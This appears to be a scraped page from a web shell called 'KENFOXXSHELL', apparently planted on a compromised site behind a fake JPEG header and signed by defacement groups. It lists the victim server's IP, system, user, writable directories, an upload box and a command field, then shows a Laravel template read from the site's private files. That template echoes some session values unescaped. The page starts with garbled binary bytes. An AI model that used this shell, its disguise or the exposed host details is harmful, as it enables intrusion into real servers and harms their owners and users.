ÿØÿàJFIFHHÿÛC     ÿÛC  ÿÂ"ÿÄÿÄÿÚ ±5¬€ÿÄàÿÚÿÄÀÿÚ?ÿÄÀÿÚ?ÿÄàÿÚ?ÿÄàÿÚ?!ÿÚ ÿÄÀÿÚ?ÿÄÀÿÚ?ÿÄàÿÚ?ÿÙ Donat Was Here
KENFOXXSHELL
Server IP : 160.25.81.117  /  Your IP : 216.73.216.137
Web Server : Apache/2
System : Linux sv05.hilab.cloud 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : bellizen ( 1045)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/bellizen/domains/bellizeno.com/private_html/vaoday/resources/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/bellizen/domains/bellizeno.com/private_html/vaoday/resources/views/index.blade.php
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <?php 
        $setting = Cache::get('setting');
         if(!empty($_SESSION['lang'])){
            if(!empty($_SESSION)) 
            $a = $_SESSION['lang'];
            else
            $a = 'en';
        } else{
           $a = 'en';  
        }
    ?>
    <meta http-equiv="content-language" content="vi" />
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=1" />
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=9; IE=8; IE=7; IE=EDGE" />
    <meta name="robots" content="noindex, nofollow, noall" />
    <meta name='revisit-after' content='1 days' />
    <title><?php if(!empty($title)) echo $title; else echo $setting->title; ?></title>
    <meta name="author" content="{!! $setting->website !!}" />
    <meta name="copyright" content="nguyennhan091@gmail.com" />
    <meta name="keywords" content="<?php if(!empty($keyword)) echo $keyword; else echo $setting->keyword; ?>" />
    <meta name="description" content="<?php if(!empty($description)) echo $description; else echo $setting->description; ?>" />
    <meta http-equiv="content-language" content="vi" />
    <meta property="og:title" content="<?php if(!empty($title)) echo $title; else echo $setting->title; ?>" />
    <meta property="og:locale" content="vi_VN"/>
    <meta property="og:url" content="{!! $setting->website !!}" />
    <meta property="og:site_name" content="<?php if(!empty($title)) echo $title; else echo $setting->title; ?>" />
    <meta property="og:type" content="website" />
    <meta property="og:image" content="<?php if(!empty($img_share)) echo $img_share; else echo asset('upload/hinhanh/'.$setting->photo) ?>" />
    <meta property="og:description" content="<?php if(!empty($description)) echo $description; else echo $setting->description; ?>" />
    <meta name="googlebot" content="noall, noindex, nofollow" />
    <meta name="geo.region" content="VN" />
    <meta name="geo.position" content="10.764338, 106.69208" />
    <meta name="geo.placename" content="Hà Nội" />
    <meta name="Area" content="HoChiMinh, Saigon, Hanoi, Danang, Vietnam" />
    <link rel="shortcut icon" href="{!! asset('upload/hinhanh/'.$setting->favico) !!}" type="image/png" />
    <!---------------------------->
     <link href="{{ asset('public/plugin/fonts/transfonter/stylesheet.css') }}" rel="stylesheet" />
    <link href="https://fonts.googleapis.com/css?family=Nunito+Sans:300,300i,400,400i,600,600i,700,700i" rel="stylesheet">
    <link href="{{ asset('public/plugin/fonts/font-awesome/css/font-awesome.min.css') }}" rel="stylesheet" />
    <link href="{{ asset('public/plugin/animate/css/animate.css') }}" rel="stylesheet" />
    <link href="{{ asset('public/plugin/bootstrap/css/bootstrap.min.css') }}" rel="stylesheet" />
    <link rel="stylesheet" href="{{ asset('public/suss/semantic.min.css') }}"/>
    <link rel="stylesheet" href="{{ asset('public/suss/flexslider.min.css') }}" />
    <link href="{{ asset('public/plugin/mmenu/jquery.mmenu.all.css') }}" rel="stylesheet" />
    <link href="{{ asset('public/plugin/animsition/css/animsition.min.css') }}" rel="stylesheet" />
    <link href="{{ asset('public/plugin/slick/slick.css') }}" rel="stylesheet" />
    <link href="{{ asset('public/css/style.css') }}" rel="stylesheet" />
    <!--<link href="css/customize.css" rel="stylesheet" />-->
    <script src="{{ asset('public/plugin/modernizr.js') }}"></script>
    <script src="{{ asset('public/plugin/jquery/jquery-3.2.1.min.js') }}"></script>
    <script src="{{ asset('public/plugin/jquery/jquery-migrate-3.0.0.min.js') }}"></script>
    
    <!-------------->
    <script src="{{ asset('public/js/nhan/jquery.min.js') }}"></script>
    
    <script type="text/javascript">
      function homeUrl(){
          return '{!! url('/') !!}'
      }
    </script>
    <script src="{{ asset('public/js/nhan/jquery-migrate-1.1.0.js') }}"></script>
    <script type="text/javascript" src="{{ asset('public/js/AStarRating/js/jquery.raty.js') }}"></script>
    <script src="{{ asset('public/plugin/numeral.min.js')}}"></script>
</head>
<body>
<div class="main-wrapper">
       <!---- thanhkho------->
        <link href="{{ asset('public/suss/toastr.min.css') }}" rel="stylesheet" />
        <script src="{{ asset('public/suss/toastr.min.js') }}"></script>
       <script type="text/javascript">
            $(document).ready(function(){
                toastr.options = {
                    "closeButton": true,
                    "debug": false,
                    "newestOnTop": false,
                    "progressBar": false,
                    "positionClass": "toast-top-right",
                    "preventDuplicates": false,
                    "onclick": null,
                    "showDuration": "300",
                    "hideDuration": "1000",
                    "timeOut": "5000",
                    "extendedTimeOut": "1000",
                    "showEasing": "swing",
                    "hideEasing": "linear",
                    "showMethod": "fadeIn",
                    "hideMethod": "fadeOut"
                }
            });
        </script>
      <!------------ scrip o day ----------->
        @if(Session::has('toastr_msg'))
            <script type='text/javascript'>
                toastr["{!! Session::get('toastr_lvl') !!}"]("{!! Session::get('toastr_msg') !!}")
            </script>
        @endif
   @include('templates.layout.header')
   <!--./content-->
    @yield('content')
    @include('templates.layout.footer')
</div>
 
 

<script src="{{ asset('public/plugin/popper/popper.min.js') }}"></script>
<script src="{{ asset('public/plugin/bootstrap/js/bootstrap.min.js') }}"></script>
<script src="{{ asset('public/suss/semantic.min.js') }}"></script>
<script src="{{ asset('public/suss/jquery.flexslider.min.js') }}"></script>
<script src="{{ asset('public/plugin/mmenu/jquery.mmenu.all.js') }}"></script>
<script src="{{ asset('public/plugin/animsition/js/animsition.min.js') }}"></script>
<script src="{{ asset('public/plugin/waypoint/jquery.waypoints.min.js') }}"></script>
<script src="{{ asset('public/plugin/stellar/jquery.stellar.min.js') }}"></script>
<script src="{{ asset('public/plugin/slick/slick.min.js') }}"></script>
<script src="{{ asset('public/plugin/scrollup/jquery.scrollUp.min.js') }}"></script>
<script src="{{ asset('public/plugin/stickOnScroll/jquery.stickOnScroll.min.js') }}"></script>
<script src="{{ asset('public/plugin/main.js') }}"></script>
</body>
</html>

Anon7 - 2022
AnonSec Team